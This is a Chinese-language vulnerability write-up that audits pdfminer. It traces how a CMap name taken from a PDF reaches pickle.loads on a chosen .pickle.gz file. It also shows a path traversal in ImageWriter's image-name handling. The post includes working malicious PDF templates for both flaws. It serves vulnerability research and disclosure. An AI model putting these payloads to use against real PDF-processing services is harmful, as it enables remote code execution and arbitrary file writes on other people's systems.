Pdfminer code auditing and script development

script path: https://github.com/L1nq0/Pdfminer-CMap-Generator

CMapDB Deserialization

cmapdb.py#CMapDB._load_data 调用 pickle.loads



_load_data 传入参数 name 去除空字节,并插入 %s.pickle.gz 中,然后将 cmap_paths 中路径与 filename 拼接;CMAP_PATH 为 cmap 的绝对路径如 /../site-packages/pdfminer/cmap,如果拼接后的文件真实存在,则用 gzip 模块读取并将内容交由 pickle.loads() 反序列化。

要求文件真实存在,文件名写死为 .pickle.gz 后缀且是正确的 gzip 文件体,才会反序列化

class CMapDB:
    """Holds class-level CMap caches and loads pickled CMap data from disk."""

    _cmap_cache: Dict[str, PyCMap] = {}
    _umap_cache: Dict[str, List[PyUnicodeMap]] = {}

    class CMapNotFound(CMapError):
        """Raised when no ``<name>.pickle.gz`` file exists in any search path."""

    @classmethod
    def _load_data(cls, name: str) -> Any:
        """Load the pickled data for CMap ``name`` and wrap it in a new type.

        NUL characters are stripped from ``name``; the file name
        ``<name>.pickle.gz`` is then joined onto each search directory (the
        ``CMAP_PATH`` environment variable, defaulting to
        ``/usr/share/pdfminer/``, followed by the ``cmap`` directory next to
        this module). The first existing file is decompressed and unpickled.

        :param name: CMap name used to build the file name.
        :return: a dynamically created type whose namespace is the unpickled
            object.
        :raises CMapDB.CMapNotFound: if no matching file exists.
        """
        name = name.replace("\0", "")
        filename = "%s.pickle.gz" % name
        log.debug("loading: %r", name)
        cmap_paths = (
            os.environ.get("CMAP_PATH", "/usr/share/pdfminer/"),
            os.path.join(os.path.dirname(__file__), "cmap"),
        )
        for directory in cmap_paths:
            path = os.path.join(directory, filename)
            if os.path.exists(path):
                # SECURITY NOTE(review): `name` is not validated, and
                # os.path.join() discards `directory` when `filename` is
                # absolute, so a caller-controlled name selects an arbitrary
                # *.pickle.gz file that is then fed to pickle.loads().
                # Read the stream exactly once: a second read() on the same
                # handle returns b"" and pickle.loads(b"") raises EOFError.
                with gzip.open(path) as gzfile:
                    return type(str(name), (), pickle.loads(gzfile.read()))
        raise CMapDB.CMapNotFound(name)

上游调用路径分析

CMAP_PATH 与 /usr/share/pdfminer/ 基本不可控,无法往其路径写/传文件,要走进 pickle 必须 name 可控。

往前追踪,get_cmap(cls, name: str)方法从缓存中获取 CMap,如果缓存中没有,则调用 _load_data 来加载 cmap 数据

class CMapDB:
    """Excerpt: cached lookup of CMap objects by name."""

    _cmap_cache: Dict[str, PyCMap] = {}

    @classmethod
    def get_cmap(cls, name: str) -> CMapBase:
        """Return the CMap registered under ``name``.

        The four identity names are answered with freshly built identity
        CMaps. Any other name is served from ``_cmap_cache``; on a miss the
        data is loaded through ``_load_data`` and the resulting ``PyCMap`` is
        cached before being returned.
        """
        # Identity encodings never touch the cache or the file system.
        if name == "Identity-H":
            return IdentityCMap(WMode=0)
        if name == "Identity-V":
            return IdentityCMap(WMode=1)
        if name == "OneByteIdentityH":
            return IdentityCMapByte(WMode=0)
        if name == "OneByteIdentityV":
            return IdentityCMapByte(WMode=1)

        if name in cls._cmap_cache:
            return cls._cmap_cache[name]

        loaded = PyCMap(name, cls._load_data(name))
        cls._cmap_cache[name] = loaded
        return loaded

再往前,pdffont.py::PDFCIDFont.get_cmap_from_spec() 调用了 get_cmap

class PDFCIDFont(PDFFont):
    """Excerpt: CMap resolution for a CID font."""

    def get_cmap_from_spec(self, spec: Mapping[str, Any], strict: bool) -> CMapBase:
        """Resolve the CMap named by a font specification.

        The name is obtained from ``_get_cmap_name`` and looked up through
        ``CMapDB.get_cmap``. When the lookup raises ``CMapDB.CMapNotFound``,
        an empty ``CMap`` is returned unless ``strict`` is set, in which case
        the error is re-raised as ``PDFFontError``.
        """
        requested = self._get_cmap_name(spec, strict)
        try:
            resolved = CMapDB.get_cmap(requested)
        except CMapDB.CMapNotFound as err:
            if not strict:
                return CMap()
            raise PDFFontError(err)
        return resolved

cmap_name 属性受 _get_cmap_name() 控制,进入该方法。spec 是一个字典对象,键是 str 类型,值的类型是任意的 Any;

get_cmap_from_spec 会从 spec 中提取 Encoding 键下的 cmap 名称。如果 Encoding 中包含 CMapName 键,则该键的值会作为 cmap 名称传递给 get_cmap 方法。

class PDFCIDFont(PDFFont):
    """Excerpt: extraction of the CMap name from a font specification."""

    # Declared static: the method takes no instance argument and is invoked
    # as ``self._get_cmap_name(spec, strict)``.
    @staticmethod
    def _get_cmap_name(spec: Mapping[str, Any], strict: bool) -> str:
        """Get cmap name from font specification.

        :param spec: font specification; its ``"Encoding"`` entry is read.
        :param strict: when true, a missing encoding or a stream without
            ``CMapName`` raises ``PDFFontError`` instead of being tolerated.
        :return: the cmap name, passed through ``IDENTITY_ENCODER`` so that a
            known alias is replaced by its mapped value.
        :raises PDFFontError: in strict mode, as described above.
        """
        cmap_name = "unknown"  # default value

        try:
            spec_encoding = spec["Encoding"]
            if hasattr(spec_encoding, "name"):
                # The encoding object itself carries the name.
                cmap_name = literal_name(spec_encoding)
            else:
                # Otherwise the name is stored under its CMapName key.
                cmap_name = literal_name(spec_encoding["CMapName"])
        except KeyError:
            if strict:
                raise PDFFontError("Encoding is unspecified")

        if type(cmap_name) is PDFStream:  # type: ignore[comparison-overlap]
            cmap_name_stream: PDFStream = cast(PDFStream, cmap_name)
            if "CMapName" in cmap_name_stream:
                cmap_name = cmap_name_stream.get("CMapName").name
            else:
                if strict:
                    raise PDFFontError("CMapName unspecified for encoding")

        return IDENTITY_ENCODER.get(cmap_name, cmap_name)

此时参数传递从 spec['Encoding'] -> cmap_name -> name,如果 spec 可控则能影响 cmap 打开的文件名。

继续往上追踪,PDFCIDFont 类初始化时调用了 get_cmap_from_spec,__init__初始化定义了一些对象和属性,继续往上追 spec



在 pdfinterp.py::PDFResourceManager.get_font() 找到相关操作,subtype 被赋值为 spec['Subtype'],如果其是 CIDFontType0、CIDFontType2 任意之一,则实例化 PDFCIDFont。关键就在 spec,但它由谁控制仍未知,带着疑问继续往前追



init_resources() 先赋值 resources 字典,如果值为 Font 且其内部键值属于 PDFObjRef 类或子类,便调用 pdftypes.dict_value(x: object) 将 'Font' 对象中的关键字段一一取出交给 spec,并传给 get_font(objid, spec)

class PDFPageInterpreter:
    """Excerpt: initialisation of per-page resource tables."""

    def init_resources(self, resources: Dict[object, object]) -> None:
        """Rebuild the font, XObject and colour-space maps from ``resources``.

        The maps are always reset; when ``resources`` is empty nothing else
        happens. Otherwise each entry is dispatched on its key: ``Font``
        entries are resolved and passed to ``rsrcmgr.get_font``,
        ``ColorSpace`` entries are converted by the local helper, ``ProcSet``
        is forwarded to ``rsrcmgr.get_procset`` and ``XObject`` entries are
        stored as-is.
        """
        self.resources = resources
        self.fontmap: Dict[object, PDFFont] = {}
        self.xobjmap = {}
        self.csmap: Dict[str, PDFColorSpace] = PREDEFINED_COLORSPACE.copy()
        if not resources:
            return

        def get_colorspace(spec: object) -> Optional[PDFColorSpace]:
            """Build a colour space from a name or a ``[name, operand]`` list."""
            is_list = isinstance(spec, list)
            name = literal_name(spec[0] if is_list else spec)
            has_operand = is_list and 2 <= len(spec)
            if name == "ICCBased" and has_operand:
                return PDFColorSpace(name, stream_value(spec[1])["N"])
            if name == "DeviceN" and has_operand:
                return PDFColorSpace(name, len(list_value(spec[1])))
            return PREDEFINED_COLORSPACE.get(name)

        for key, value in dict_value(resources).items():
            log.debug("Resource: %r: %r", key, value)
            if key == "Font":
                for fontid, spec in dict_value(value).items():
                    # Remember the object id of indirect references before
                    # resolving them to a dictionary.
                    objid = spec.objid if isinstance(spec, PDFObjRef) else None
                    font_spec = dict_value(spec)
                    self.fontmap[fontid] = self.rsrcmgr.get_font(objid, font_spec)
            elif key == "ColorSpace":
                for csid, spec in dict_value(value).items():
                    colorspace = get_colorspace(resolve1(spec))
                    if colorspace is None:
                        continue
                    self.csmap[csid] = colorspace
            elif key == "ProcSet":
                self.rsrcmgr.get_procset(list_value(value))
            elif key == "XObject":
                self.xobjmap.update(dict_value(value).items())

process_page() 将 page.resources 丢给 render_contents() 执行,随后 resources 被传递给 init_resources(),这里的 resources 就是被 dict_value 处理的 Font 对象

class PDFPageInterpreter:
    """Excerpt: page processing entry points."""

    def process_page(self, page: PDFPage) -> None:
        """Render one page on the device.

        A transformation matrix is chosen from ``page.rotate`` and
        ``page.mediabox``; the page's resources and contents are then handed
        to ``render_contents`` between ``begin_page`` and ``end_page``.
        """
        log.debug("Processing page: %r", page)
        mx0, my0, mx1, my1 = page.mediabox
        rotation = page.rotate
        if rotation == 90:
            ctm = (0, -1, 1, 0, -my0, mx1)
        elif rotation == 180:
            ctm = (-1, 0, 0, -1, mx1, my1)
        elif rotation == 270:
            ctm = (0, 1, -1, 0, my1, -mx0)
        else:
            ctm = (1, 0, 0, 1, -mx0, -my0)
        self.device.begin_page(page, ctm)
        self.render_contents(page.resources, page.contents, ctm=ctm)
        self.device.end_page(page)

    def render_contents(
        self,
        resources: Dict[object, object],
        streams: Sequence[object],
        ctm: Matrix = MATRIX_IDENTITY,
    ) -> None:
        """Initialise resources and state, then execute the content streams."""
        log.debug(
            "render_contents: resources=%r, streams=%r, ctm=%r", resources, streams, ctm
        )
        self.init_resources(resources)
        self.init_state(ctm)
        content_streams = list_value(streams)
        self.execute(content_streams)

最后追到入口点,一共找到两个

  • high_level.py::extract_pages()
  • high_level.py::extract_text()

    这两个方法都用于从 PDF 文件中提取信息,本身就是 Pdfminer 与外部交互的主要入口,利用链到此到头
def extract_text(
    pdf_file: FileOrName,
    password: str = "",
    page_numbers: Optional[Container[int]] = None,
    maxpages: int = 0,
    caching: bool = True,
    codec: str = "utf-8",
    laparams: Optional[LAParams] = None,
) -> str:
    """Return all text found in a PDF file as one string.

    :param pdf_file: path or file-like object of the PDF to read.
    :param password: password used to decrypt an encrypted PDF.
    :param page_numbers: zero-indexed page numbers to extract.
    :param maxpages: maximum number of pages to parse.
    :param caching: whether resources should be cached.
    :param codec: text decoding codec.
    :param laparams: layout parameters; a default ``LAParams()`` is used
        when None.
    :return: the extracted text.
    """
    laparams = LAParams() if laparams is None else laparams

    with open_filename(pdf_file, "rb") as fp, StringIO() as output_string:
        fp = cast(BinaryIO, fp)  # we opened in binary mode
        rsrcmgr = PDFResourceManager(caching=caching)
        device = TextConverter(rsrcmgr, output_string, codec=codec, laparams=laparams)
        interpreter = PDFPageInterpreter(rsrcmgr, device)

        pages = PDFPage.get_pages(
            fp,
            page_numbers,
            maxpages=maxpages,
            password=password,
            caching=caching,
        )
        for page in pages:
            interpreter.process_page(page)

        return output_string.getvalue()


def extract_pages(
    pdf_file: FileOrName,
    password: str = "",
    page_numbers: Optional[Container[int]] = None,
    maxpages: int = 0,
    caching: bool = True,
    laparams: Optional[LAParams] = None,
) -> Iterator[LTPage]:
    """Yield one ``LTPage`` layout object per processed page.

    :param pdf_file: path or file-like object of the PDF to read.
    :param password: password used to decrypt an encrypted PDF.
    :param page_numbers: zero-indexed page numbers to extract.
    :param maxpages: maximum number of pages to parse.
    :param caching: whether resources should be cached.
    :param laparams: layout parameters; a default ``LAParams()`` is used
        when None.
    :return: an iterator of LTPage objects.
    """
    laparams = LAParams() if laparams is None else laparams

    with open_filename(pdf_file, "rb") as fp:
        fp = cast(BinaryIO, fp)  # we opened in binary mode
        resource_manager = PDFResourceManager(caching=caching)
        device = PDFPageAggregator(resource_manager, laparams=laparams)
        interpreter = PDFPageInterpreter(resource_manager, device)
        pages = PDFPage.get_pages(
            fp,
            page_numbers,
            maxpages=maxpages,
            password=password,
            caching=caching,
        )
        for page in pages:
            interpreter.process_page(page)
            # The aggregator exposes the layout of the page just processed.
            yield device.get_result()

溯源整个流程,从 extract_ 双方法开始。PDFPage.get_pages() 会通过 PDFParser 解析 PDF 文件,并生成一个 PDFDocument 对象。这个对象包含了文档的结构和元数据。然后迭代文档中的每一页,并调用 create_pages(doc) 来生成具体的页面对象。然后提取的 PDF 元数据交给下游方法处理

class PDFPage:
    """Excerpt: page iteration over a parsed PDF document."""

    # Declared as a classmethod: the first parameter is ``cls`` and callers
    # invoke it as ``PDFPage.get_pages(fp, ...)``.
    @classmethod
    def get_pages(
        cls,
        fp: BinaryIO,
        pagenos: Optional[Container[int]] = None,
        maxpages: int = 0,
        password: str = "",
        caching: bool = True,
        check_extractable: bool = False,
    ) -> Iterator["PDFPage"]:
        """Parse ``fp`` and yield its pages.

        :param fp: binary file object of the PDF.
        :param pagenos: if given and non-empty, only pages whose zero-based
            index is contained in it are yielded.
        :param maxpages: if non-zero, iteration stops once the page with
            index ``maxpages - 1`` has been reached.
        :param password: password passed to ``PDFDocument``.
        :param caching: caching flag passed to ``PDFDocument``.
        :param check_extractable: when true, a document flagged as not
            extractable raises instead of only logging a warning.
        :raises PDFTextExtractionNotAllowed: if the document is not
            extractable and ``check_extractable`` is true.
        """
        parser = PDFParser(fp)
        doc = PDFDocument(parser, password=password, caching=caching)
        if not doc.is_extractable:
            if check_extractable:
                error_msg = "Text extraction is not allowed: %r" % fp
                raise PDFTextExtractionNotAllowed(error_msg)
            else:
                warning_msg = (
                    "The PDF %r contains a metadata field "
                    "indicating that it should not allow "
                    "text extraction. Ignoring this field "
                    "and proceeding. Use the check_extractable "
                    "if you want to raise an error in this case" % fp
                )
                log.warning(warning_msg)
        for pageno, page in enumerate(cls.create_pages(doc)):
            if pagenos and (pageno not in pagenos):
                continue
            yield page
            # The limit is checked after yielding, so skipped pages do not
            # count towards it but their index still does.
            if maxpages and maxpages <= pageno + 1:
                break

利用链

high_level.py::extract_pages()/extract_text()
pdfinterp.py::PDFPageInterpreter.process_page(page)
pdfinterp.py::PDFPageInterpreter.render_contents(resources, contents)
pdfinterp.py::PDFPageInterpreter.init_resources(resources)
pdfinterp.py::PDFResourceManager.get_font(objid, spec)
pdffont.py::PDFCIDFont.__init__(rsrcmgr, spec, strict)
pdffont.py::PDFCIDFont.get_cmap_from_spec(spec, strict)
cmapdb.py::CMapDB.get_cmap(cmap_name)
cmapdb.py::CMapDB._load_data(name)

将 PDF Font 对象关键字段定义好,Type = Type0、Subtype = CIDFontType0 or CIDFontType2、Encoding = GZIP 文件绝对路径,同时绝对路径中 /需要替换为 #2F,并使用 extract_pages()/extract_text() 操作 PDF 文件,Pdfminer 就会读取 GZIP 内容并反序列化

PDF 格式体利用示例

%PDF-1.4
%E2%E3%CF%D3
1 0 obj
<< /Type /Catalog /Pages 2 0 R >>
endobj 2 0 obj
<< /Type /Pages /Count 1 /Kids [3 0 R] >>
endobj 3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Resources << /Font << /F1 5 0 R >> >> /Contents 4 0 R >>
endobj 4 0 obj
<< /Length 22 >>
stream
BT /F1 12 Tf (A) Tj ET
endstream
endobj 5 0 obj
<< /Type /Font /Subtype /Type0 /BaseFont /Identity-H /Encoding /#2Fapp#2Fuploads#2Fl1 /DescendantFonts [6 0 R] >>
endobj 6 0 obj
<< /Type /Font /Subtype /CIDFontType2 /BaseFont /Dummy /CIDSystemInfo << /Registry (Adobe) /Ordering (Identity) /Supplement 0 >> >>
endobj xref
0 7
0000000000 65535 f
0000000010 00000 n
0000000077 00000 n
0000000176 00000 n
0000000273 00000 n
0000000325 00000 n
0000000375 00000 n
trailer
<< /Size 7 /Root 1 0 R >>
startxref
410
%%EOF

Path Traversal in ImageWriter

在看 Pdfminer 的图片提取与写入功能时发现的逻辑缺陷,虽然没什么实际用处,还是简单提一下

当使用 Pdfminer 提取 PDF 中的图片时,通常可以这样调用

# Walk every page layout and export each image found inside a figure.
for page in extract_pages(pdf_file):
    for element in page:
        if not isinstance(element, LTFigure):
            continue
        for item in element:
            if not isinstance(item, LTImage):
                continue
            result = writer.export_image(item)

Pdfminer 会将 PDF 中的图片保存到指定目录。但问题来了,保存时文件名经过怎样的处理呢?

通过阅读源码,我发现关键逻辑在 ImageWriter._create_unique_image_name 中:

def _create_unique_image_name(self, image: LTImage, ext: str) -> Tuple[str, str]:
name = image.name + ext
path = os.path.join(self.outdir, name)
img_index = 0
while os.path.exists(path):
name = "%s.%d%s" % (image.name, img_index, ext)
path = os.path.join(self.outdir, name)
img_index += 1
return name, path

_create_unique_image_name 在处理 PDF 文件中的图片资源时,直接使用了 XObject 的名称作为输出文件名的一部分,与输出路径 outdir 拼接形成新路径,没有做精细校验,与上面分析类似 PDF 可控则 image.name 可控

Pdfminer 解析并创建 LTImage 对象,其 name 属性赋值为指定路径,export_image 是操作入口

class ImageWriter:
    """Excerpt: dispatch of an image to the matching save routine."""

    def export_image(self, image: LTImage) -> str:
        """Save an LTImage to disk and return the file name that was used.

        The save routine is chosen, in order, from the last stream filter
        (DCT, JPX), the JBIG2 check, the bit depth and colour space, a lone
        Flate filter, and finally a raw dump as the fallback.
        """
        width, height = image.srcsize
        filters = image.stream.get_filters()
        last_filter = filters[-1][0]

        if last_filter in LITERALS_DCT_DECODE:
            return self._save_jpeg(image)
        if last_filter in LITERALS_JPX_DECODE:
            return self._save_jpeg2000(image)
        if self._is_jbig2_iamge(image):
            return self._save_jbig2(image)

        if image.bits == 1:
            # Third size argument: width in bits rounded up to whole bytes.
            return self._save_bmp(image, width, height, (width + 7) // 8, image.bits)
        if image.bits == 8 and (
            LITERAL_DEVICE_RGB in image.colorspace
            or LITERAL_INLINE_DEVICE_RGB in image.colorspace
        ):
            return self._save_bmp(image, width, height, width * 3, image.bits * 3)
        if image.bits == 8 and (
            LITERAL_DEVICE_GRAY in image.colorspace
            or LITERAL_INLINE_DEVICE_GRAY in image.colorspace
        ):
            return self._save_bmp(image, width, height, width, image.bits)

        if len(filters) == 1 and filters[0][0] in LITERALS_FLATE_DECODE:
            return self._save_bytes(image)
        return self._save_raw(image)

获取到文件名及路径后,Pdfminer 直接以 path 打开文件并通过 fp.write 写入内容;假设 path 为 /x/x/uploads/../../../tmp/l1.jpg,就能进行跨目录写文件

def _save_jpeg(self, image: LTImage) -> str:
    """Write a JPEG-encoded image to disk and return its file name.

    The stream data is written unchanged unless the colour space contains
    the CMYK literal; in that case the image is opened with PIL, inverted,
    converted to RGB and saved as JPEG.

    :raises ImportError: if the CMYK path is needed and PIL is missing.
    """
    data = image.stream.get_data()
    name, path = self._create_unique_image_name(image, ".jpg")
    with open(path, "wb") as fp:
        if LITERAL_DEVICE_CMYK not in image.colorspace:
            fp.write(data)
            return name

        # PIL is imported lazily because only the CMYK path needs it.
        try:
            from PIL import Image, ImageChops  # type: ignore[import]
        except ImportError:
            raise ImportError(PIL_ERROR_MESSAGE)

        source = Image.open(BytesIO(data))
        inverted = ImageChops.invert(source)
        inverted.convert("RGB").save(fp, "JPEG")
    return name

如果控制 PDF 内的 XObject 名称,是否就可控写入?我构造一个恶意 PDF 来完成构想

3 0 obj
<<
/Type /Page
/Resources <<
/XObject <<
/#2E#2E#2F#2E#2E#2F#2E#2E#2F#2E#2E#2Ftmp#2Fpwned 4 0 R
>>
>>
>>
...

path 成功控制为指定内容



便写入成功了



Python 的环境限制大,不像 PHP 可以直接解析执行代码,应用环境特别狭窄,只有某些情况下打 XSS 等,没危害;并且这里后缀名也是强制拼接,无法控制

name, path = self._create_unique_image_name(image, ".jpg")
=>
def _create_unique_image_name(self, image: LTImage, ext: str) -> Tuple[str, str]:
name = image.name + ext
path = os.path.join(self.outdir, name)
img_index = 0
while os.path.exists(path):
name = "%s.%d%s" % (image.name, img_index, ext)
path = os.path.join(self.outdir, name)
img_index += 1
return name, path
...
@staticmethod
def _is_jbig2_iamge(image: LTImage) -> bool:
    """Return True if any filter of the image stream is a JBIG2 filter."""
    return any(
        filter_name in LITERALS_JBIG2_DECODE
        for filter_name, _params in image.stream.get_filters()
    )

Pdfminer-Vulnerability-Research的更多相关文章

  1. 转:Awesome Vulnerability Research

    转:https://github.com/re-pronin/Awesome-Vulnerability-Research Awesome Vulnerability Research 

  2. Burp Suite教程(英文版)

    In this article, we are going to see another powerful framework that is used widely in pen-testing. ...

  3. IIS短文件漏洞(搬运整理)

    0x01. IIS短文件漏洞的由来 Microsoft IIS 短文件/文件夹名称信息泄漏最开始由Vulnerability Research Team(漏洞研究团队)的Soroush Dalili在 ...

  4. (转)Awesome Courses

    Awesome Courses  Introduction There is a lot of hidden treasure lying within university pages scatte ...

  5. IIS短文件猜解

    1.IIS短文件漏洞 Microsoft IIS 短文件/文件夹名称信息泄漏最开始由Vulnerability Research Team(漏洞研究团队)的Soroush Dalili在2010年8月 ...

  6. An iOS zero-click radio proximity exploit odyssey

    NOTE: This specific issue was fixed before the launch of Privacy-Preserving Contact Tracing in iOS 1 ...

  7. PHP serialize && unserialize Security Risk Research

    目录 . 序列化的定义 . serialize:序列化 . unserialize:反序列化 . 序列化.反序列化存在的安全风险 . Use After Free Vulnerability -] . ...

  8. Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)

    In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which ...

  9. ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728)

    ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728) By Perception Point Resear ...

  10. Research Guide: Pruning Techniques for Neural Networks

    Research Guide: Pruning Techniques for Neural Networks 2019-11-15 20:16:54 Original: https://heartbe ...

随机推荐

  1. vscode linux c++ 配置

    简介 最官方的配置方案 https://code.visualstudio.com/docs/cpp/config-linux 有三个文件会生成 tasks.json (编译器构建设置) launch ...

  2. 推荐一款比Flink CDC更好用的免费CDC工具

    很多中大型企业都希望选择一款足够轻量好用的CDC工具,而且最好是小白用户都能使用的CDC工具,今天就推荐一款小白都能安装并立即使用的CDC工具给大家. CDC(Change Data Capture) ...

  3. SciTech-Science: 纯色滤(分)光塑料片: 将光分解为BGR三原纯色(彩色CCD传感器原理) + “502熏显法”采集“指纹”与Glue胶水: 普通胶水是“胶”与“水”混合物因此不会黏上瓶子

    彩色滤(分)光塑料片: 将光分解为BGR三原纯色 彩色CCD传感器原理 透过 一张 彩色滤(分)光塑料片 可以分解出 光源的"与滤光片同颜色"的成份: 例如 "B(蓝色) ...

  4. win11专业版取消开机密码的问题

    许多雨林木风官网的小伙伴在第一次安装win11专业版的时候,设置了帐号和密码,但是每次电脑开机都要输入密码,使用起来非常不方便.那么,我们要如何取消开机密码呢?接下来,ylmf系统小编就来分享详细的操 ...

  5. Unity中Inspector面板显示提示

    效果如下 上面有个 "可选变量"  ,然后鼠标移动到变量上会显示一段文字 实现方法 [Header("可选变量")]//直接显示汉字在面板上 [Tooltip( ...

  6. 从git仓库下载 单个文件或者文件夹

    转载自:https://www.cnblogs.com/yaolaoer/p/14564985.html 下载单个文件到压缩包:aab.zipgit archive --remote=ssh://ge ...

  7. RFX2401C 2.4G射频放大电路

    RFX2401C RFX2401C 是一个2.4 GHz频段射频放大芯片, 尺寸只有3mm*3mm, qfn16封装, 单芯片集成PA和LNA, 外围电路简单, 在带功率放大的nrf24l01模块以及 ...

  8. 如何用 mc 对 RustFS 进行存储桶的创建和查询?

    mc(minio client)是一个与 Minio 对象存储服务兼容的命令行工具,能够对 minio 进行操作,诸如文件的上传.下载.删除等.由于 RustFS 是 MinIO 的国产替代,因此可以 ...

  9. PPT(一)-默认设置

    一.暗夜模式 二.无限撤回 三.自动保存 四.图片压缩 五.字体嵌入 防止不同电脑打开字体不一样 六.多格式导出 实际上是可以将ppt文件导出成pdf.视频.图片形式的ppt的. ppt的每页导出成图 ...

  10. 简单的博客页面客制化 v1

    DIY博客的页面 写在前面: 申请了博客第一件事当然是整一个炫酷的界面. 自己水平不够,选了个比较顺眼的皮肤,大部分是套用网上现成的模板完成的. 具体定制的内容: 1.字体的修改 2.版面占比的调整 ...